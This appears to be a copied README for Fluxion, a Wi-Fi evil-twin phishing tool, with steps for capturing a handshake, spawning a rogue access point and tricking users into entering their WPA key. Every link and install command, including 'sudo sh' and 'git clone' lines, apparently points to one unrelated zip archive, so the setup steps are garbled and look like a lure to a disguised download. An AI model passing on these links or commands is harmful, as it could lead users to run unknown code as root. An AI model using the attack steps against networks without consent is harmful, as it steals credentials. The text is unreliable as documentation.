Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) less bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phising) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual, but experimental auto-mode handles some of the attacks' setup parameters. Read the [FAQ](https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip) before requesting issues.
Share your own router page with a simple script
cd scripts
sudo sh https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip
Read [here](https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip) before you do the following steps.
Download the latest revision
git clone --recursive https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip
Switch to tool's directory
cd fluxion
Run fluxion (missing dependencies will be auto-installed)
https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip
Fluxion gets weekly updates with new features, improvements, and bugfixes. Be sure to check out the [changelog here](https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip).
How to contributeAll contributions are welcome! Code, documentation, graphics, or even design suggestions are welcome; use GitHub to its fullest. Submit pull requests, contribute tutorials or other wiki content -- whatever you have to offer, it'll be appreciated but please follow the [style guide](https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip).
-
Scan for a target wireless network.
-
Launch the
Handshake Snooperattack. -
Capture a handshake (necessary for password verification).
-
Launch
Captive Portalattack. -
Spawns a rogue (fake) AP, imitating the original access point.
-
Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal.
-
Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key.
-
Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP.
-
All authentication attempts at the captive portal are checked against the handshake file captured earlier.
-
The attack will automatically terminate once a correct key has been submitted.
-
The key will be logged and clients will be allowed to reconnect to the target access point.
-
For a guide to the
Captive Portalattack, read the [Captive Portal attack guide](https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip)
A Linux-based operating system. We recommend Kali Linux 2 or Kali rolling. Kali 2 & rolling support the latest aircrack-ng versions. An external wifi card is recommended.
For development I use vim and tmux. Here are my [dotfiles](https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip)
- l3op - contributor
- dlinkproto - contributor
- vk496 - developer of linset
- Derv82 - @Wifite/2
- Princeofguilty - @webpages and @buteforce
- Photos for wiki https://raw.githubusercontent.com/anieqh/fluxion/master/attacks/Captive Portal/language/Software_v3.6.zip
- Ons Ali @wallpaper
- PappleTec @sites
- MPX4132 - Fluxion V3
-
Authors do not own the logos under the
/attacks/Captive Portal/sites/directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. -
The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.
-
Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware.
-
Fluxion DOES NOT WORK on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be Closed Immediately